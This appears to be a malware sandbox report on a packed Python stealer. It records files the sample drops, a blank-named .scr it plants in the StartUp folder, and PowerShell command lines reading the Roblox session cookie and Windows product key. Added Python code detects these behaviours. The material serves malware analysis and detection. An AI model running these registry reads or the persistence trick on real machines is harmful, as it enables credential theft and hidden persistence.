              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: 9g9LZNE4bH.exe, 9g9LZNE4bH.exe, 00000002.00000002.2407338183.00007FF8A87E1000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000046.00000000.2310221598.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmp, rar.exe, 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmp, rar.exe.0.dr
              Source: Binary string: D:\a\1\b\bin\amd64\python311.pdb source: 9g9LZNE4bH.exe, 00000002.00000002.2407700677.00007FF8A8CCC000.00000040.00000001.01000000.00000004.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: 9g9LZNE4bH.exe, 00000002.00000002.2410652961.00007FF8B9F61000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: 9g9LZNE4bH.exe, 00000002.00000002.2409933422.00007FF8B8F71000.00000040.00000001.01000000.00000006.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: 9g9LZNE4bH.exe, 9g9LZNE4bH.exe, 00000002.00000002.2408813480.00007FF8B7E01000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: 9g9LZNE4bH.exe, 00000002.00000002.2409638089.00007FF8B8B3C000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\_w\1\b\libssl-1_1.pdb@@ source: 9g9LZNE4bH.exe, 00000002.00000002.2408503396.00007FF8A9356000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: 9g9LZNE4bH.exe, 00000002.00000002.2410441345.00007FF8B9841000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: 9g9LZNE4bH.exe, 00000002.00000002.2409638089.00007FF8B8B3C000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\3lfchnc2\3lfchnc2.pdbhPV source: powershell.exe, 0000002A.00000002.2242595273.000001C03B705000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: 9g9LZNE4bH.exe, 00000002.00000002.2410254689.00007FF8B93C1000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: 9g9LZNE4bH.exe, 00000002.00000002.2409190880.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: 9g9LZNE4bH.exe, 00000002.00000002.2409408125.00007FF8B8AF1000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1s 1 Nov 2022built on: Mon Jan 9 20:35:28 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: 9g9LZNE4bH.exe, 00000002.00000002.2406298429.00007FF8A86AF000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: 9g9LZNE4bH.exe, 9g9LZNE4bH.exe, 00000002.00000002.2406298429.00007FF8A8731000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\3lfchnc2\3lfchnc2.pdb source: powershell.exe, 0000002A.00000002.2242595273.000001C03B705000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: 9g9LZNE4bH.exe, 9g9LZNE4bH.exe, 00000002.00000002.2409000197.00007FF8B7E21000.00000040.00000001.01000000.0000000E.sdmp
Source: 9g9LZNE4bH.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 9g9LZNE4bH.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 9g9LZNE4bH.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 9g9LZNE4bH.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 9g9LZNE4bH.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

              Data Obfuscation

              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY (2 entries)
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER (2 entries)
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault (2 entries)
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: VCRUNTIME140.dll.0.dr | Static PE information: 0x8E79CD85 [Sat Sep 30 01:19:01 2045 UTC]
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3lfchnc2\3lfchnc2.cmdline" (2 entries)
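              The Get-ItemPropertyValue reads above (the Roblox .ROBLOSECURITY session cookie, PROCESSOR_IDENTIFIER and BackupProductKeyDefault) and the csc.exe launch from a response file under the user's Temp directory are the process-creation events a detection would key on. The Python below is an added example and is not part of the Joe Sandbox report or of the analysed sample: it tags constructed process events whose command lines are copied from the report lines above. The tag names, the SENSITIVE_VALUES table, the regular expressions and the benign control event are this example's own choices.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent: str    # image path of the process that spawned this one
    image: str     # image path of the new process
    cmdline: str   # full command line as logged


# Registry values whose read is worth a finding, keyed by the tag to emit.
# These three are the ones this report shows; the table itself is an
# assumption of this example and should be extended for other families.
SENSITIVE_VALUES = {
    "roblox_session_cookie": re.compile(r"-Name\s+\.ROBLOSECURITY\b", re.I),
    "windows_product_key":   re.compile(r"-Name\s+BackupProductKeyDefault\b", re.I),
    "hardware_fingerprint":  re.compile(r"-Name\s+PROCESSOR_IDENTIFIER\b", re.I),
}
REG_READ_CMDLET = re.compile(r"\bGet-ItemProperty(Value)?\b", re.I)
# csc.exe response file (@"...cmdline") that lives under a per-user Temp directory
TEMP_RESPONSE_FILE = re.compile(r'@"?[^"\s]*\\AppData\\Local\\Temp\\[^"\s]*\.cmdline"?', re.I)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(ev: ProcEvent) -> list:
    """Return the sorted list of tags that fire for one process-creation event."""
    tags = set()
    image, parent = _basename(ev.image), _basename(ev.parent)
    if image == "powershell.exe" and REG_READ_CMDLET.search(ev.cmdline):
        tags.add("registry_read")
        for tag, pattern in SENSITIVE_VALUES.items():
            if pattern.search(ev.cmdline):
                tags.add(tag)
    if image == "csc.exe":
        if TEMP_RESPONSE_FILE.search(ev.cmdline):
            tags.add("csc_from_temp")
        if parent == "powershell.exe":
            tags.add("csc_spawned_by_powershell")
    return sorted(tags)


def triage_all(events) -> dict:
    """Map each command line that produced findings to its tags."""
    out = {}
    for ev in events:
        tags = triage(ev)
        if tags:
            out[ev.cmdline] = tags
    return out


CMD = r"C:\Windows\System32\cmd.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CSC = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"

# Constructed events: the command lines are copied from this report and the
# parent/child pairing is as the report lists it; the last event is a benign
# control that should produce no findings.
SAMPLE_EVENTS = [
    ProcEvent(CMD, PS, r"powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"),
    ProcEvent(CMD, PS, r"powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"),
    ProcEvent(CMD, PS, r"powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"),
    ProcEvent(PS, CSC, r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3lfchnc2\3lfchnc2.cmdline"'),
    ProcEvent(CMD, PS, r"powershell Get-Date"),
]

if __name__ == "__main__":
    for cmdline, tags in triage_all(SAMPLE_EVENTS).items():
        print(", ".join(tags), "<-", cmdline)
```

              One caveat on the csc.exe tags: PowerShell's Add-Type compiles C# through exactly this csc.exe invocation with a response file under %TEMP%, so "csc_spawned_by_powershell" and "csc_from_temp" also fire on legitimate administration scripts. What makes them meaningful here is the company they keep in the same report (the sensitive registry reads, the Defender changes and the credential theft listed in the signature overview), so treat them as a correlation input rather than a stand-alone alert.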
              Source: libcrypto-1_1.dll.0.dr | Static PE information: real checksum: 0x0 should be: 0x117bde
              Source: _ctypes.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x169d3
              Source: unicodedata.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x4c48e
              Source: 3lfchnc2.dll.43.dr | Static PE information: real checksum: 0x0 should be: 0x318a
              Source: _bz2.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x10b2e
              Source: libffi-8.dll.0.dr | Static PE information: real checksum: 0x0 should be: 0xb515
              Source: _ssl.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x1e77b
              Source: sqlite3.dll.0.dr | Static PE information: real checksum: 0x0 should be: 0x9d35e
              Source: libssl-1_1.dll.0.dr | Static PE information: real checksum: 0x0 should be: 0x3e84b
              Source: _queue.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x1592c
              Source: _socket.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0xc215
              Source: python311.dll.0.dr | Static PE information: real checksum: 0x0 should be: 0x1ad857
              Source: _decimal.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x20a78
              Source: _hashlib.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0xa303
              Source: select.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x138cb
              Source: _lzma.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x23fb5
              Source: 9g9LZNE4bH.exe | Static PE information: real checksum: 0x6dbf4b should be: 0x6e2df3
              Source: _sqlite3.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x19f80
              Source: libffi-8.dll.0.dr | Static PE information: section name: UPX2
              Source: VCRUNTIME140.dll.0.dr | Static PE information: section name: _RDATA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FF8474DD2A5 pushad ; iretd | 7_2_00007FF8474DD2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FF8475F841D push ebx; retn 0009h | 7_2_00007FF8475F841A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FF8475F83D5 push ebx; retn 0009h | 7_2_00007FF8475F841A
              Source: initial sample | Static PE information: section name: UPX0 (16 entries)
              Source: initial sample | Static PE information: section name: UPX1 (16 entries)
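              Two of the static findings above come straight out of the PE headers: the "real checksum: 0x0 should be: ..." lines compare the optional header's CheckSum field with the value the imagehlp checksum algorithm produces over the file, and the UPX0/UPX1/UPX2 section names are the packer's default names. The Python below is an added example, not code from the Joe Sandbox report or from the analysed sample; it builds a constructed minimal PE image in memory, parses the section table, recomputes the checksum the way imagehlp's CheckSumMappedFile (and pefile's generate_checksum) does, and reports the mismatch in the report's own wording. The build_pe fixture, the field values it fills in and the PACKER_SECTION_NAMES set are this example's assumptions.

```python
import struct

PACKER_SECTION_NAMES = {"UPX0", "UPX1", "UPX2"}   # names this report shows; extend as needed


def build_pe(section_names, header_checksum=0, pe32plus=True):
    """Constructed fixture: a minimal PE image (DOS header, PE signature, COFF
    header, optional header, one section header per name, a small body).
    Only the fields the analysis reads are meaningful; it is not loadable."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    opt_size = 240 if pe32plus else 224
    coff = struct.pack("<HHIIIHH",
                       0x8664 if pe32plus else 0x14C,  # Machine
                       len(section_names),             # NumberOfSections
                       0, 0, 0,                        # TimeDateStamp, symbol table ptr/count
                       opt_size,                       # SizeOfOptionalHeader
                       0x22)                           # Characteristics
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0x00, 0x20B if pe32plus else 0x10B)  # Magic
    struct.pack_into("<I", opt, 0x40, header_checksum)               # CheckSum
    sections = b""
    for name in section_names:
        sections += name.encode("ascii")[:8].ljust(8, b"\0") + struct.pack(
            "<IIIIIIHHI", 0x1000, 0x1000, 0x200, 0x400, 0, 0, 0, 0, 0x60000020)
    body = b"\x90" * 0x200 + b"\xCC" * 3   # odd length: exercises the tail-padding path
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sections + body


def parse_headers(data):
    """Return (file offset of the CheckSum field, its stored value, section names)."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    checksum_off = opt + 0x40            # same offset in PE32 and PE32+
    stored = struct.unpack_from("<I", data, checksum_off)[0]
    names = []
    for i in range(nsections):
        start = opt + opt_size + 40 * i  # section table follows the optional header
        names.append(data[start:start + 8].rstrip(b"\0").decode("ascii", "replace"))
    return checksum_off, stored, names


def pe_checksum(data, checksum_off):
    """CheckSum as imagehlp's CheckSumMappedFile computes it: fold every 32-bit
    word except the CheckSum field itself into a 16-bit sum with end-around
    carry, then add the file length. Assumes checksum_off is 4-byte aligned,
    which holds whenever e_lfanew is."""
    length = len(data)
    padded = data + b"\0" * (-length % 4)
    skip = checksum_off // 4
    total = 0
    for i in range(0, len(padded), 4):
        if i // 4 == skip:
            continue
        total += struct.unpack_from("<I", padded, i)[0]
        if total >= 1 << 32:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    total &= 0xFFFF
    return (total + length) & 0xFFFFFFFF


def analyze(data):
    checksum_off, stored, names = parse_headers(data)
    computed = pe_checksum(data, checksum_off)
    return {
        "header_checksum": stored,
        "computed_checksum": computed,
        "checksum_ok": stored == computed,
        "sections": names,
        "packer_sections": [n for n in names if n in PACKER_SECTION_NAMES],
    }


if __name__ == "__main__":
    r = analyze(build_pe(["UPX0", "UPX1", ".rsrc"]))
    print("real checksum: %#x should be: %#x" % (r["header_checksum"], r["computed_checksum"]))
    print("sections:", r["sections"], "packer hint:", r["packer_sections"])
```

              Read the checksum lines with the right weight: a CheckSum of 0x0 is what you get from any binary linked without /RELEASE, and Windows only enforces the field for drivers and for DLLs loaded at boot or into critical system processes, so on its own a mismatch says little about intent. The UPX0/UPX1 section names are the stronger static hint, and the combination (a UPX-packed PyInstaller bootstrap that drops python311.dll and a set of .pyd modules into a _MEI directory) is what to look for when triaging similar samples.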

              Persistence and Installation Behavior

              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe | Process created: "C:\Users\user\Desktop\9g9LZNE4bH.exe"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI61762\python311.dll
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI61762\VCRUNTIME140.dll
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI61762\_sqlite3.pyd
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI61762\sqlite3.dll
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI61762\libffi-8.dll
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI61762\select.pyd
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI61762\_queue.pyd
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI61762\_lzma.pyd
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI61762\libssl-1_1.dll
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI61762\unicodedata.pyd
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI61762\_bz2.pyd
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI61762\_ssl.pyd
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\3lfchnc2\3lfchnc2.dll
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI61762\_ctypes.pyd
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI61762\libcrypto-1_1.dll
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI61762\_decimal.pyd
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI61762\_socket.pyd
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI61762\_hashlib.pyd
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe | File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr (2 entries)
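              The persistence entry the report records is a file in the all-users StartUp folder whose name is a single space followed by .scr: the blank stem makes it easy to overlook in a folder listing, and a .scr is an ordinary PE that the shell launches like an .exe at logon. The Python below is an added example and not part of the Joe Sandbox report or of the sample; it scans a Startup folder and flags entries with whitespace-only names or executable or script extensions, exercised against a constructed temporary directory that stands in for the folder above. The suffix sets, the tag names and the two folder paths in ALL_USERS_STARTUP and USER_STARTUP are this example's choices.

```python
import os
import tempfile
from pathlib import Path

# The two Startup folders the shell processes at logon (all users, then the current user).
ALL_USERS_STARTUP = r"%ProgramData%\Microsoft\Windows\Start Menu\Programs\StartUp"
USER_STARTUP = r"%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"

# .scr is what this report shows; the remaining suffixes are the usual dropper
# payload types and are an assumption of this example.
EXECUTABLE_SUFFIXES = {".scr", ".exe", ".com", ".pif"}
SCRIPT_SUFFIXES = {".bat", ".cmd", ".vbs", ".js", ".ps1", ".hta"}


def classify_startup_entry(path):
    """Return the findings for one Startup-folder entry (empty list = nothing odd)."""
    path = Path(path)
    findings = []
    if path.stem.strip() == "":
        # the name is nothing but whitespace, so it renders as a blank row in Explorer
        findings.append("blank_name")
    suffix = path.suffix.lower()
    if suffix in EXECUTABLE_SUFFIXES:
        findings.append("executable_payload")
    elif suffix in SCRIPT_SUFFIXES:
        findings.append("script_payload")
    return findings


def scan_startup_folder(folder):
    """Map entry name -> findings for every flagged entry in one folder."""
    folder = Path(folder)
    if not folder.is_dir():
        return {}
    result = {}
    for entry in sorted(folder.iterdir()):
        findings = classify_startup_entry(entry)
        if findings:
            result[entry.name] = findings
    return result


def scan_default_startup_folders():
    """Scan the real Startup folders of the host this runs on (meaningful on Windows only)."""
    return {f: scan_startup_folder(os.path.expandvars(f)) for f in (ALL_USERS_STARTUP, USER_STARTUP)}


def demo():
    """Constructed fixture: a temporary directory standing in for the StartUp
    folder, holding the blank-named .scr this report observed next to benign entries."""
    with tempfile.TemporaryDirectory() as d:
        Path(d, " .scr").write_bytes(b"MZ")
        Path(d, "OneDrive.lnk").write_bytes(b"L")
        Path(d, "desktop.ini").write_text("[.ShellClassInfo]\n")
        return scan_startup_folder(d)


if __name__ == "__main__":
    print(demo())
```

              On a live host, pair the folder scan with the file's hash and PE headers (the checksum and section-name checks from the static findings apply to the dropped .scr as well), because a legitimate shortcut can sit next to the payload and a name-only heuristic will miss a payload that copies a plausible product name.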

              Hooking and other Techniques for Hiding and Protection

              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (12 entries)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (9 entries)
              Note: PowerShell reads every module manifest on $PSModulePath while auto-discovering a command, so these opens of BitLocker.psd1 show module enumeration by the PowerShell instances above, not that a BitLocker cmdlet was invoked; the report contains no BitLocker command line.
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe | Code function: 0_2_00007FF78DA576B0 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError, | 0_2_00007FF78DA576B0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
